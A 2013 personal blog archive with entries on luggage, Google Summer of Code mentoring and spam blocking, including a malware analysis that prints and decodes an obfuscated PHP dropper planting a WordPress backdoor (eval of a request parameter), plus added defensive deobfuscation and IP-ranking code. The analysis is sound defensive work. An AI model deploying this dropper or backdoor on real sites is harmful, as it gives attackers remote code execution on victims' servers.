terriko: Adorable icon care of John (bubble bobble)
2013-05-14 02:17

Scooter luggage and travel cosplay.

Luggage with a built-in scooter is awesome. I've seen ride-on wheeled luggage for kids (and coveted it mightily), and this appears to be the adult-friendly equivalent. Sadly, does not meet a lot of my other criteria (I'd be shocked if they let me avoid gatechecking this) and it's $250 (But at least shipping is free...). I'm tempted just for the awesome factor.


Here's a small hard case that meets a lot more of my criteria. It clocks in at 35cmx39cmx23cm (that's 14"x15"x9" for those of us who have to fly in America) and comes in cheerful colours. I'm actually not sure which one I'd choose -- normally I shun the pinks but that dark one is pretty lovely and would fit nicely into some sort of business-travelling fashionista persona if I dressed the part with some business casuals. But maybe the green or red would be less likely to clash with my existing wardrobe.... Honestly, I'm approaching this project much like I do cosplay, and now that I think about it it's not really that different: I'm playing for an audience to believe me to be someone very specific. Nevermind that I'm still projecting a variant on me; it's all the same body language, fashion, and carefully chosen accessories that make it work.

Similarly, a bright orange gem that could probably work with the persona too. 36x44x20cm (14x17x8") for that one, and only two wheels tucked into the edges so probably a bit more packing space in the final tally.

But despite the obvious appeal for my in-progress traveler persona, I'm not seeing any useful way for me to get reviews of these that I can actually understand since they're shipping from Hong Kong, and I haven't quite decided if I really should be making a hundred dollar gamble just because the colours are fun. I wonder if it's possible to find something similar that's at least a little more local to me? I have learned the useful new search terms "rolling business case" but it's mostly been turning up uninspired blackness.


Incidentally, I *did* check the wirecutter and they do have a section on bags, just not the kind I'm looking for. Bags are one of those few things I'm exceptionally picky about (especially right now while mildly injured, but even when not I tend to have precise requirements) so it probably isn't that much of a loss. They're apparently looking for a freelance bag editor and I rather wish I were actually the right person for that job. Lot of work for little pay, but a chance to try lots of bags!
terriko: Adorable icon care of John (bubble bobble)
2013-05-09 11:47

Smaller travel bags

I currently own a 20" rolling carry-on bag that has met my airline & train travel needs for years (I switched to it a year or two before airlines started charging for checked bags), and it's perfect for a week-long conference where I'm coming back or going out with a lot of stuff, or when I'm visiting my parents for close to a month at Christmas, but it seems excessive when I'm going for a weekend trip or a job interview.

I'm considering getting a smaller suitcase for those shorter trips, so I'm working out my requirements. This thread covers more or less what I have in mind, but here's some personal preference/requirement notes:

1. Must have wheels. I used to do backpack+purse for shorter trips, but I've been finding that I often pinch a nerve during travel and I'm pretty sure carrying my camera/laptop on my back is a factor.

2. Can fit my laptop and possibly SLR camera + 2-3 days worth of clothes. Thankfully my clothes are pretty small. Camera may be optional: I'm trying a downgrade to a point and shoot for short trips.

3. Preferably I'd like something that can fit into the overhead bin on the smaller regional jets, since often my flight will have one hop with those. A search says that this means the bag will have to be around 18Lx14Wx7D. Sounds like you can fit larger, but I'd rather not have to argue it out with the gate staff / flight attendant every time. I am perfectly ok with being given a checked tag and then "obliviously" carrying my bag on the plane anyhow as long as it will fit, though.

4. But not arguing with the gate/flight staff every time I fly would be awesome. This may mean going with something more backpack-like so I can just put it on my back when I walk on the plane, but mostly it just reinforces "small" and "looks like it holds a laptop." Briefcases should work.

5. Should have an open clothing section as opposed to a bunch of filefolder divider things that will make it harder to pack.

6. Should open fully, at least for the clothing section. Pure preference on my part.

7. I'm not too picky about laptop sleeves, although something I can easily slip a laptop out of for the TSA or in case I do have to check the bag is good. I basically never use my laptop on the plane, I just don't want to skycheck it.

8. If at all possible, not black. Something like 90% of the suitcases I see are black and I don't want to be worrying about someone grabbing mine by mistake.

9. But (and I realize this may contradict the "not black" thing) something that looks more business traveller-y would be good. I have a *lot* of trouble with TSA reps assuming I'm young or an infrequent traveler which is especially frustrating when I go somewhere with J and they immediately assume he's an expert while I get the "oh, hon, you know our machines are perfectly safe?" talk-down-to-the-little-girl spiel. (My new response: "My sister is a physicist who works in health and safety; I'd like to opt out." which is factually true but irrelevant and calculated to throw them and possibly nearby travelers out of their default headspace without getting into an argument.)




I've been finding that
(a) A disturbing number of online sites don't give pictures of the inside of the bags.
(b) A disturbing number of online sites don't give dimensions or even pictures that could help me guess the dimensions
(c) Bags are expensive (duh)
(d) There is an entire market for "women's suitcases" which I find somewhat strange. Particularly given that the "women's briefcase-bags" seem pretty much identical to the non-women's ones.



I don't have any short trips scheduled, but I'm hoping to find some bag options I like and catch a sale (luggage goes on sale quite frequently, so it's a bit ridiculous to pay full price if I've got time to spare).

I would love to hear first hand testimonials from any of you who travel with a bag that might meet my needs, though. It was a recommendation from Linuxchix that drew me to my current bag which has done me pretty well although it's starting to show its age now.
terriko: (Default)
2013-05-06 13:57

Falling down the rabbit hole: An analysis of some questionable blog spam

WARNING: This entry contains some actual malicious code. I've HTML-escaped it so that it isn't going to get executed by you viewing it, but it was clearly intended to attack Wordpress blogs, so if you're going to mess around with analyzing, do it in a browser that's not logged in to any Wordpress blog.


So I was clearing spam queues this morning, and came across a bunch of spam with this string in it:


eval(base64_decode('aWYoJGY9Zm9wZW4oJ3dwLWNvbnRlbnQvY2FjaGUvaWZvb2FnLnBocCcsJ3cnKSl7ZnB1dHMoJGYsJzw/cGhwIC8qTiVQYCUqL2V2YWwvKklmXCcsLSovKC8qPjZgSGUqL2Jhc2U2NF9kZWNvZGUvKkBNKTIqLygvKn46SDUqL1wnTHlwM1kyQTdjQ292YVdZdktuY2hibHNxTHlndktsNXpXeUZVY25CUktpOXBjM05sZEM4cVVFZzBPWHhBS2k4b0x5cDRZR3BXS1U0cUx5UmZVa1ZSVlVWVFZDOHFjaUI0S2k5Ykx5b29mbEZ4S2k4bll5Y3ZLakUvUUdWMFd5b3ZMaThcJy8qT3pNNTIwKi8uLyo5SissKi9cJ3FQU3dwS2k4bmVpY3ZLblZVUVRrektpOHVMeXBEZTBjNlFEUmNLaThuYkNjdktqaDBJRzhxTHk0dkttMTVUVDA4UkdBcUx5ZDZKeThxZUdkbk1YWTJNU292TGk4cVZuQkpaelFxTHlkNUp5OHFaWHhxZVVFcUx5NHZLaXgyS0NvdkoyXCcvKnlBdCYqLy4vKkA1RHcmXU4qL1wnd25MeXBHTFZGdlREUXFMMTB2S21KaGEwMHBLaTh2S2x3N2MyNHFMeWt2S2s1M1Mwa25YeW92THlwUFgyc3FMeWt2S2toQVlVczBWQ292WlhaaGJDOHFNazU4TWpBK0tpOG9MeXBWYzBodFdWMWxXaW92YzNSeWFYQnpiR0Z6YUdWekxcJy8qWWFiayovLi8qT35xcyovXCd5bzhTR2N6S2k4b0x5cFZRVXRoWmlvdkpGOVNSVkZWUlZOVUx5cFdMa3RVSUhzcUwxc3ZLa3N0TG1NcUx5ZGpKeThxU0c5b0tpOHVMeXBZVGp0SEtpOG5laWN2S2pzbU15Z3lNV1FtWFNvdkxpOHFPMUJQZFNvdkoyd25MeXBaV1ZBelwnLyp7WUp9MSovLi8qdisoLTtrKi9cJ2VuVXFMeTR2S2xWc2FWVXRLaThuZW5sc0p5OHFSbFJaWERRcUwxMHZLazQvVW1JK0syWXFMeThxU3l0TFF5b3ZLUzhxYkVCcUtpOHZLbUpZUENvdktTOHFPbG8yVlVVb1NrSTRLaTh2S2tKWFp6dEFTeW92T3k4cVJUc3JkaWRJS2k4PVwnLyooa0NwQFk+Ki8pLypgYmMqLy8qSHZeISovKS8qV21GKi8vKlBfV2VgYD57Ki87LyotfGxURTEqLz8+Jyk7ZmNsb3NlKCRmKTt9'));


Or this clearly related one (note that the top of the string is the same):



As you can tell from the first sample, it's base64 encoded... something. b64 is pretty commonly used by attackers to obfuscate their code, so in case the spammy username and comment that went with the code wasn't enough to tell me that something bad was intended, the b64 encoding itself would have been a clue. If I didn't have the pretty huge hint of the base64_decode line, I might have been able to figure it out from the format and the fact that I know that b64 uses = as a padding (visible at the end of the second string).

Being a curious sort of person, I decoded the first string. In my case, I just opened up Python, and did this:


>>> import base64
>>> base64.b64decode(badstring1)
"if($f=fopen('wp-content/cache/ifooag.php','w')){fputs($f,'<?php /*N%P`%*/eval/*If\\',-*/(/*>6`He*/base64_decode/*@M)2*/(/*~:H5*/\\'Lyp3Y2A7cCovaWYvKnchblsqLygvKl5zWyFUcnBRKi9pc3NldC8qUEg0OXxAKi8oLyp4YGpWKU4qLyRfUkVRVUVTVC8qciB4Ki9bLyooflFxKi8nYycvKjE/QGV0WyovLi8\\'/*OzM520*/./*9J+,*/\\'qPSwpKi8neicvKnVUQTkzKi8uLypDe0c6QDRcKi8nbCcvKjh0IG8qLy4vKm15TT08RGAqLyd6Jy8qeGdnMXY2MSovLi8qVnBJZzQqLyd5Jy8qZXxqeUEqLy4vKix2KCovJ2\\'/*yAt&*/./*@5Dw&]N*/\\'wnLypGLVFvTDQqL10vKmJha00pKi8vKlw7c24qLykvKk53S0knXyovLypPX2sqLykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oLypVc0htWV1lWiovc3RyaXBzbGFzaGVzL\\'/*Yabk*/./*O~qs*/\\'yo8SGczKi8oLypVQUthZiovJF9SRVFVRVNULypWLktUIHsqL1svKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi8neicvKjsmMygyMWQmXSovLi8qO1BPdSovJ2wnLypZWVAz\\'/*{YJ}1*/./*v+(-;k*/\\'enUqLy4vKlVsaVUtKi8nenlsJy8qRlRZXDQqL10vKk4/UmI+K2YqLy8qSytLQyovKS8qbEBqKi8vKmJYPCovKS8qOlo2VUUoSkI4Ki8vKkJXZztASyovOy8qRTsrdidJKi8=\\'/*(kCp@Y>*/)/*`bc*//*Hv^!*/)/*WmF*//*P_We``>{*/;/*-|lTE1*/?>');fclose($f);}"


(Well, okay, I actually ran cgi.escape(base64.b64decode(badstring1)) to get the version you're seeing in this blog post since I wanted to make sure none of that was executed in your browser, but that's not relevant to the code analysis, just useful if you're talking about code on the internet)

So that still looks pretty obfuscated, and even more full of base64 (yo, I heard you like base64 so I put some base64 in your base64). But we've learned a new thing: the code is trying to open up a file in the wordpress cache called ifooag.php, under wp-content which is a directory wordpress needs to have write access to. I did a quick web search, and found a bunch of spam, so my bet is that they're opening a new file rather than modifying an existing one. And we can tell that they're trying to put some php into that file because of the <?php and ?> which are character sequences that tell the server to run some php code.

But that code? Still looks pretty much like gobbledegook.

If you know a bit about php, you'll know that it accepts c-style comments delineated by /* and */, so we can remove those from the php code to get something a bit easier to parse:


eval(base64_decode(\\'Lyp3Y2A7cCovaWYvKnchblsqLygvKl5zWyFUcnBRKi9pc3NldC8qUEg0OXxAKi8oLyp4YGpWKU4qLyRfUkVRVUVTVC8qciB4Ki9bLyooflFxKi8nYycvKjE/QGV0WyovLi8\\'.\\'qPSwpKi8neicvKnVUQTkzKi8uLypDe0c6QDRcKi8nbCcvKjh0IG8qLy4vKm15TT08RGAqLyd6Jy8qeGdnMXY2MSovLi8qVnBJZzQqLyd5Jy8qZXxqeUEqLy4vKix2KCovJ2\\'.\\'wnLypGLVFvTDQqL10vKmJha00pKi8vKlw7c24qLykvKk53S0knXyovLypPX2sqLykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oLypVc0htWV1lWiovc3RyaXBzbGFzaGVzL\\'.\\'yo8SGczKi8oLypVQUthZiovJF9SRVFVRVNULypWLktUIHsqL1svKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi8neicvKjsmMygyMWQmXSovLi8qO1BPdSovJ2wnLypZWVAz\\'.\\'enUqLy4vKlVsaVUtKi8nenlsJy8qRlRZXDQqL10vKk4/UmI+K2YqLy8qSytLQyovKS8qbEBqKi8vKmJYPCovKS8qOlo2VUUoSkI4Ki8vKkJXZztASyovOy8qRTsrdidJKi8=\\'));


Feel like we're going in circles? Yup, that's another base64 encoded string. So let's take out the quotes and the concatenations to see what that is:


Lyp3Y2A7cCovaWYvKnchblsqLygvKl5zWyFUcnBRKi9pc3NldC8qUEg0OXxAKi8oLyp4YGpWKU4qLyRfUkVRVUVTVC8qciB4Ki9bLyooflFxKi8nYycvKjE/QGV0WyovLi8qPSwpKi8neicvKnVUQTkzKi8uLypDe0c6QDRcKi8nbCcvKjh0IG8qLy4vKm15TT08RGAqLyd6Jy8qeGdnMXY2MSovLi8qVnBJZzQqLyd5Jy8qZXxqeUEqLy4vKix2KCovJ2wnLypGLVFvTDQqL10vKmJha00pKi8vKlw7c24qLykvKk53S0knXyovLypPX2sqLykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oLypVc0htWV1lWiovc3RyaXBzbGFzaGVzLyo8SGczKi8oLypVQUthZiovJF9SRVFVRVNULypWLktUIHsqL1svKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi8neicvKjsmMygyMWQmXSovLi8qO1BPdSovJ2wnLypZWVAzenUqLy4vKlVsaVUtKi8nenlsJy8qRlRZXDQqL10vKk4/UmI+K2YqLy8qSytLQyovKS8qbEBqKi8vKmJYPCovKS8qOlo2VUUoSkI4Ki8vKkJXZztASyovOy8qRTsrdidJKi8=


You might think we're getting close now, but here's what you get out of decoding that:


>>> base64.b64decode(badstring1a)
"/*wc`;p*/if/*w!n[*/(/*^s[!TrpQ*/isset/*PH49|@*/(/*x`jV)N*/$_REQUEST/*r x*/[/*(~Qq*/'c'/*1?@et[*/./*=,)*/'z'/*uTA93*/./*C{G:@4\\*/'l'/*8t o*/./*myM=<D`*/'z'/*xgg1v61*/./*VpIg4*/'y'/*e|jyA*/./*,v(*/'l'/*F-QoL4*/]/*bakM)*//*\\;sn*/)/*NwKI'_*//*O_k*/)/*H@aK4T*/eval/*2N|20>*/(/*UsHmY]eZ*/stripslashes/*<Hg3*/(/*UAKaf*/$_REQUEST/*V.KT {*/[/*K-.c*/'c'/*Hoh*/./*XN;G*/'z'/*;&3(21d&]*/./*;POu*/'l'/*YYP3zu*/./*UliU-*/'zyl'/*FTY\\4*/]/*N?Rb>+f*//*K+KC*/)/*l@j*//*bX<*/)/*:Z6UE(JB8*//*BWg;@K*/;/*E;+v'I*/"


Yup, definitely going in circles. But at least we know what to do: get rid of the comments again.

Incidentally, I'm just using a simple regular expression to do this: s/\/\*[^*]*\*\///g. That's not robust against all possible nestings or whatnot, but it's good enough for simple analysis. I actually execute it in vim as :%s/\/\*[^*]*\*\///gc and then check each piece as I'm removing it.

Here's what it looks like without the comments:


if(isset($_REQUEST['c'.'z'.'l'.'z'.'y'.'l']))eval(stripslashes($_REQUEST['c'.'z'.'l'.'zyl']));


So let's stick together those concatenated strings again:


if(isset($_REQUEST['czlzyl']))eval(stripslashes($_REQUEST['czlzyl']));
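The whole peeling process above, scripted instead of done by hand in the Python prompt and vim. This is an added example (not code from the post): it starts from the first eval(base64_decode(...)) string quoted at the top of the entry and repeats the same three moves, strip the /* */ comments, join the 'a'.'b' concatenations, base64-decode the next argument, until no base64_decode() is left, then pulls out the file the dropper writes and the request parameter the backdoor reads, which are the two things you would grep a site and its access logs for. The comment regex has the same limitation as the vim one in the post (it assumes no '*' inside a comment); the function names deobfuscate, clean_layer, next_layer and indicators are my own.

```python
"""Peel the base64 / comment / concatenation layers off a PHP comment-spam payload."""
import base64
import re

# Constructed input: the first eval(base64_decode(...)) string quoted at the top
# of the post, with straight quotes instead of the blog's smart quotes.
SAMPLE = (
    "eval(base64_decode('"
    "aWYoJGY9Zm9wZW4oJ3dwLWNvbnRlbnQvY2FjaGUvaWZvb2FnLnBocCcsJ3cnKSl7ZnB1dHMoJGYsJzw/cGhwIC8qTiVQYCUqL2V2YWwvKklmXCcsLSovKC8qPjZgSGUqL2Jhc2U2NF9kZWNvZGUvKkBNKTIqLygvKn46SDUqL1wnTHlwM1kyQTdjQ292YVdZdktuY2hibHNxTHlndktsNXpXeUZVY25CUktpOXBjM05sZEM4cVVFZzBPWHhBS2k4b0x5cDRZR3BXS1U0cUx5UmZVa1ZSVlVWVFZDOHFjaUI0S2k5Ykx5b29mbEZ4S2k4bll5Y3ZLakUvUUdWMFd5b3ZMaThcJy8qT3pNNTIwKi8uLyo5SissKi9cJ3FQU3dwS2k4bmVpY3ZLblZVUVRrektpOHVMeXBEZTBjNlFEUmNLaThuYkNjdktqaDBJRzhxTHk0dkttMTVUVDA4UkdBcUx5ZDZKeThxZUdkbk1YWTJNU292TGk4cVZuQkpaelFxTHlkNUp5OHFaWHhxZVVFcUx5NHZLaXgyS0NvdkoyXCcvKnlBdCYqLy4vKkA1RHcmXU4qL1wnd25MeXBHTFZGdlREUXFMMTB2S21KaGEwMHBLaTh2S2x3N2MyNHFMeWt2S2s1M1Mwa25YeW92THlwUFgyc3FMeWt2S2toQVlVczBWQ292WlhaaGJDOHFNazU4TWpBK0tpOG9MeXBWYzBodFdWMWxXaW92YzNSeWFYQnpiR0Z6YUdWekxcJy8qWWFiayovLi8qT35xcyovXCd5bzhTR2N6S2k4b0x5cFZRVXRoWmlvdkpGOVNSVkZWUlZOVUx5cFdMa3RVSUhzcUwxc3ZLa3N0TG1NcUx5ZGpKeThxU0c5b0tpOHVMeXBZVGp0SEtpOG5laWN2S2pzbU15Z3lNV1FtWFNvdkxpOHFPMUJQZFNvdkoyd25MeXBaV1ZBelwnLyp7WUp9MSovLi8qdisoLTtrKi9cJ2VuVXFMeTR2S2xWc2FWVXRLaThuZW5sc0p5OHFSbFJaWERRcUwxMHZLazQvVW1JK0syWXFMeThxU3l0TFF5b3ZLUzhxYkVCcUtpOHZLbUpZUENvdktTOHFPbG8yVlVVb1NrSTRLaTh2S2tKWFp6dEFTeW92T3k4cVJUc3JkaWRJS2k4PVwnLyooa0NwQFk+Ki8pLypgYmMqLy8qSHZeISovKS8qV21GKi8vKlBfV2VgYD57Ki87LyotfGxURTEqLz8+Jyk7ZmNsb3NlKCRmKTt9"
    "'));"
)

# /* ... */ with no '*' inside: the same simplification as the post's vim regex.
COMMENT_RE = re.compile(r"/\*[^*]*\*/")
# 'a'.'b' (or \'a\'.\'b\' when nested inside an outer single-quoted string) -> 'ab'
CONCAT_RE = re.compile(r"\\?'\s*\.\s*\\?'")
# The first base64_decode('...') argument; the quotes may be backslash-escaped.
B64_CALL_RE = re.compile(r"base64_decode\(\s*\\?'([A-Za-z0-9+/=]+)\\?'\s*\)")
# Indicators worth keeping: files the dropper writes, parameters the backdoor reads.
FOPEN_RE = re.compile(r"fopen\('([^']+)'")
REQUEST_KEY_RE = re.compile(r"\$_REQUEST\['([^']+)'\]")


def clean_layer(php: str) -> str:
    """Strip /* */ comments, then join adjacent single-quoted string pieces."""
    return CONCAT_RE.sub("", COMMENT_RE.sub("", php))


def next_layer(php: str):
    """Decode the argument of the first base64_decode() call, or None if there is none."""
    match = B64_CALL_RE.search(php)
    if match is None:
        return None
    return base64.b64decode(match.group(1)).decode("latin-1")


def deobfuscate(php: str, max_depth: int = 10) -> list:
    """Return the cleaned form of every layer, outermost first.

    Stops when no base64_decode() remains, or at max_depth so that a blob which
    keeps producing more blobs cannot keep us looping forever."""
    layers = []
    current = php
    while current is not None and len(layers) < max_depth:
        cleaned = clean_layer(current)
        layers.append(cleaned)
        current = next_layer(cleaned)
    return layers


def indicators(layers) -> tuple:
    """Collect written file paths and $_REQUEST parameter names across all layers."""
    paths, keys = set(), set()
    for layer in layers:
        paths.update(FOPEN_RE.findall(layer))
        keys.update(REQUEST_KEY_RE.findall(layer))
    return sorted(paths), sorted(keys)


if __name__ == "__main__":
    found = deobfuscate(SAMPLE)
    for depth, layer in enumerate(found):
        print(f"--- layer {depth} ---\n{layer}\n")
    files, params = indicators(found)
    print("files written:", files)
    print("request parameters read:", params)
```

Run as-is it prints three layers: the original eval() line, the dropper that opens wp-content/cache/ifooag.php, and finally the one-line backdoor keyed on czlzyl. Treat the two indicator lists as the thing to check for on a site that received the same spam: a file at that path that should not exist, and requests for it carrying that parameter in the access log.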



Okay, so now it's added some piece into some sort of wordpress file that is basically just waiting for some outside entity to provide code which will then be executed. That's actually pretty interesting: it's not fully executing the malicious payload now; it's waiting for an outside request. Is this to foil scanners that are wise to the type of things spammers add to blogs, or is this in preparation for a big attack that could be launched all at once once the machines are prepared?

It's going to be a request that starts like this: http://EXAMPLE.COM/wp-content/cache/ifooag.php?czlzyl=

Unfortunately, I don't have access to the logs for the particular site I saw this on, so my analysis stops here and I can't tell you exactly what it was going to try to execute, but I think it's pretty safe to say that it wouldn't have been good. I can tell you that there is no such file on the server in question and, indeed, the code doesn't seem to have been executed since it got caught in the spam queue and discarded by me.

But if you've ever had a site compromised and wondered how it might have been done, now you know a whole lot more about the way it could have happened. All I can really suggest is that spam blocking is important (these comments were caught by akismet) and that if you can turn off javascript while you're moderating comments, that might be the safest possible thing to do even though it makes using wordpress a little more kludgy and annoying. Thankfully it doesn't render it unusable!

Meanwhile, want to try your own hand at analyzing code? I only went through the full decoding for the first of the two strings I gave at the top of this post, but I imagine the second one is very similar to the first, so I leave it as an exercise to the reader. Happy hacking!
terriko: (Pi)
2013-05-06 11:35

Remove 80% of your blog comment spam by blocking IPTelligent!

I maintain a couple of blogs outside of this one, and the most popular one I'm involved with gets a lot of spam. There seemed to be a particular uptick about a month back, and I went to look into it.

What I discovered is that quite a lot of our spam (around 80%) was coming from one company called IPTelligent LLC. There's no easy way for me to tell if they are a legit company who simply have the worst IT staff in the history of IT staffs and all of their machines are compromised, or if they are, in fact, evil jerks who are repeatedly attempting to pollute the internet with really terrible spam. Given a short websearch, it seems pretty likely that IPTelligent is intentionally evil. I suppose one could argue that the level of incompetence displayed by someone who not only runs that many compromised machines but also serves up malware consistently is a form of evil even if it wasn't intentional. Whatever.

Either way, they are responsible for a rather large percentage of the spam we were receiving, and not responsible for any legit visits that we could see.

Since this particular blog uses Wordpress, solving the problem was pretty simple. Wordpress has built-in lists for blocking comments, but they simply send matching comments to the moderation queue, as does the popular plugin Akismet. Since we were seeing hundreds of messages per day from IPTelligent, I needed something that banned them more completely so our moderators wouldn't even see the messages and have to scan through them. Thankfully, there are lots of plugins for this. I settled on one called wp-ban that seems to be working well for my needs.

Once that's installed, the settings are under Settings->Ban. At the top of my list, I now have

# IPTelligent owns these ips, and they seem to be a spam company
96.47.225.*
173.44.37.*
96.47.224.*


Which covers the majority of the IPs that were hitting us with spam. A glance at a more specific list of IPTelligent IPs suggests that those lines are good enough right now, although it's possible that they'll buy more IP blocks eventually. (We also have a longer list of other IPs that appear to be compromised and were causing problems, but they look more like temporary compromises than intentional, long-term malice so I'm not listing those IPs here).
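The "went to look into it" step, as an added example that is not the post's code and not part of wp-ban: given the source IP of each spam comment, rank the /24 networks they come from so the heavy hitters stand out, then measure how much of the sample the three ban lines above would have stopped. The list of IPs is constructed to mimic what the post describes (most of it inside the three ranges, a couple of stragglers elsewhere); the conversion of wp-ban's "prefix.*" lines into networks assumes that '*' stands for whole trailing octets, and the function names are mine.

```python
"""Rank comment-spam sources by network and measure what a wp-ban list would catch."""
from collections import Counter
import ipaddress

# Constructed sample: the source IP of each spam comment pulled from a moderation
# queue. The 96.47.224.x, 96.47.225.x and 173.44.37.x entries fall in the ranges
# the post attributes to IPTelligent; the last two are made-up stragglers.
SPAM_COMMENT_IPS = [
    "96.47.225.14", "96.47.225.14", "96.47.225.77", "96.47.224.3",
    "173.44.37.200", "173.44.37.201", "96.47.225.90", "173.44.37.9",
    "203.0.113.45", "198.51.100.7",
]

# The three ban lines from the post, in wp-ban's "prefix.*" notation.
BAN_LIST = ["96.47.225.*", "173.44.37.*", "96.47.224.*"]


def pattern_to_network(pattern: str) -> ipaddress.IPv4Network:
    """Convert a wildcard pattern such as '96.47.225.*' into 96.47.225.0/24.

    Assumption: '*' stands for whole trailing octets, so 'a.b.c.*' is a /24,
    'a.b.*.*' a /16 and a bare address a /32."""
    octets = pattern.split(".")
    if len(octets) != 4:
        raise ValueError(f"expected four dotted fields: {pattern!r}")
    fixed = []
    for octet in octets:
        if octet == "*":
            break
        fixed.append(octet)
    if not fixed or any(o != "*" for o in octets[len(fixed):]):
        raise ValueError(f"only trailing wildcards are supported: {pattern!r}")
    base = ".".join(fixed + ["0"] * (4 - len(fixed)))
    return ipaddress.ip_network(f"{base}/{8 * len(fixed)}")


def rank_sources(ips, prefix_len: int = 24):
    """Count spam comments per network of the given prefix length, most common first."""
    counts = Counter(
        str(ipaddress.ip_network(f"{ip}/{prefix_len}", strict=False)) for ip in ips
    )
    return counts.most_common()


def is_banned(ip: str, patterns) -> bool:
    """True if the address falls inside any pattern on the ban list."""
    addr = ipaddress.ip_address(ip)
    return any(addr in pattern_to_network(p) for p in patterns)


def ban_coverage(ips, patterns) -> float:
    """Fraction of the sampled spam comments the ban list would have stopped."""
    blocked = sum(1 for ip in ips if is_banned(ip, patterns))
    return blocked / len(ips)


if __name__ == "__main__":
    for network, count in rank_sources(SPAM_COMMENT_IPS):
        print(f"{network:20} {count}")
    print(f"ban list stops {ban_coverage(SPAM_COMMENT_IPS, BAN_LIST):.0%} of the sample")
```

Re-running the ranking every so often is the cheap way to notice the "they'll buy more IP blocks eventually" case: a new /24 climbing the list is the signal to check whois and extend the ban list.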

Of course, it would be better if someone took the company to court for this. I am not a lawyer, but it seems to me that the Computer Fraud and Abuse Act must cover at least some portion of their activities. I mean, the things they charged Aaron Swartz with under that act seem less sketchy than what IPTelligent is doing. But court cases take time and money, and banning them right now is pretty easy, so I figured I'd share the short-term solution in case it's useful to anyone who'd like to get a little less spam right away. (We are indeed getting ~80% less spam since the bans went into place.)

For the record, here's the company info as I get from the whois database right now:

OrgName:        IPTelligent LLC
OrgId:          IPTEL-1
Address:        2115 NW 22nd Street
Address:        #C110
City:           Miami
StateProv:      FL
PostalCode:     33142
Country:        US
RegDate:        2009-03-31
Updated:        2012-07-16
Ref:            http://whois.arin.net/rest/org/IPTEL-1

ReferralServer: rwhois://rwhois.iptelligent.com:4321

OrgNOCHandle: NOC3572-ARIN
OrgNOCName:   Network Operations Center
OrgNOCPhone:  +1-888-638-5893
OrgNOCEmail:  sysop@iptelligent.com
OrgNOCRef:    http://whois.arin.net/rest/poc/NOC3572-ARIN
terriko: Yup, I took this one. The eyes are paper, not photoshop (chair)
2013-05-06 10:38

Updates and links

First some me-related updates:


  • I got to help staff a table at roborave on Saturday. Fun! I was too busy to take pictures, so don't ask.

  • GSoC ranking continues apace. It's actually less busy for me than it was, since I don't need to interact with the students as much until selection is finished, so I've gone from over a hundred people potentially wanting to talk to me to something closer to 20-30. (project admins + mentors with melange trouble). I expect there'll be some wrangling to make sure the Systers and Mailman don't have any overlapping project ideas, but that can wait a few days.

  • To save people from asking me: I'm not expecting to hear about the Portland job for another couple of weeks. This is actually pretty convenient for me since it means I can focus on GSoC during the selection period; hooray for good timing!



And then some links that amused me:

terriko: (Pi)
2013-04-25 17:07

Two interview questions I enjoyed

There's a longer, friends-locked post before this one talking about the interviews I had this week, but it occurs to me that the more general public might get a kick out of the two interview questions that most amused me:

My new favourite interview question:

Given this code...

if ( X ) 
  print("hello")
else 
  print("world")



What do you need to insert in place of X in order to get this code to print "helloworld" ?



And the second one:


If you're in a room with a light bulb that's on, how can you make it be off?


(This was asked shortly after they told me they were asking to see if I had the security mindset, which is a pretty huge clue as to the types of answers they were hoping to hear. I had a lot of fun with this.)


I am leaving my answers out of this post so that you can think about the possibilities yourselves, but of course feel free to discuss in the comments.
terriko: (Pi)
2013-04-21 18:04

Finding the best thing (without reading all the reviews)

I know geeks are stereotypically supposed to love drooling over new technology and comparing specs and stuff, but that's never really been my scene. There are things I care about enough to do research on, things I have particular requirements for that I want to meet, and then there's everything else. I don't want to buy/download/use crap, and I don't want to read breathless review after breathless review.

So I was really excited to hear about The Wirecutter, which purports to just list off the best thing (with a few alternatives) in various classes of things.

It's interesting, too, that it's got stuff like the big wait sign on this page right now which tells you that new stuff is coming so if you're not desperate, you might as well wait 'till they've been able to review the new things. Makes me feel a lot more reassured about the freshness of their information.

Used it for the first time yesterday to replace my defective point-and-shoot camera (which is a longer story, but one I'm not telling today) and it was fantastic to spend so little time making a decision. We'll see how it works out long run, but it's already saved me hours of my life and I came away feeling pretty close to as informed as I do after reading All The Reviews. Win!
terriko: Adorable icon care of John (bubble bobble)
2013-04-13 09:37

GSoC students: Doing the personal email thing right

So, after I threatened to make this my new form letter (FYI: I haven't, but I do cut and paste from it to make shorter, more personal answers) the first email I see from a student is, again, personally to me, but... he was totally doing it right. Posted to the mailing list, waited a bit for a response, checked to see who was talking about this idea last, saw it was me, then pinged me to ask if I'd seen the posts (which he linked to make it easier for me) and asked if I could help answer his questions.

I am so pleased. :)

And now, I'd best stop talking about how lovely the email is and get on to that part where I either answer him or deflect to a mentor who isn't quite so overwhelmed this weekend... Did I mention I'm going out of town tomorrow?
terriko: (Pi)
2013-04-11 16:45

The GSoC email that may become my new form letter

In case anyone was worried, no, I haven't actually started sending out form letters, but I am using this as a template I can cut & paste from for shorter, more personal emails to students.

Dear prospective student,

I've been getting a *lot* of personal emails/irc queries/IM messages since I took over as the organizational administrator for the Python Software Foundation. It's pretty neat because I'm really thrilled to see so many people excited about Google Summer of Code, but mostly, you shouldn't be contacting me directly.

If you're interested in one of the Python projects:

Take a look at the list of organizations running projects under the PSF:
http://wiki.python.org/moin/SummerOfCode/2013

Each one has a mailing list and sometimes an IRC channel associated with it. That is where you should be introducing yourself and asking questions.

If you are not sure who to contact for any reason, you should be asking on the soc2013-general mailing list. You can subscribe to this here:
http://mail.python.org/mailman/listinfo/soc2013-general/

If you're emailing me with regard to Systers and not a project under the Python Software Foundation, the same things apply only the relevant list is systers-dev, available here:
http://systers.org/mailman/listinfo/systers-dev


Why shouldn't you email me?

1. If you email the lists, lots of mentors from around the world will see your question. If I'm asleep or at work, they'll probably be able to answer it faster than I can.
2. If you email the lists and the person answering you answers on the list, it can benefit all the people who might have a similar question.
3. Chances are, I'm not going to be the mentor for your project, so there is someone out there who can answer your question better than I can.


Thanks very much, and good luck in your GSoC applications!

Terri
terriko: (Default)
2013-04-04 22:18

Lemon Googe Cupcakes (or Lubricated Lemon Cupcakes, if you prefer, but you probably don't)

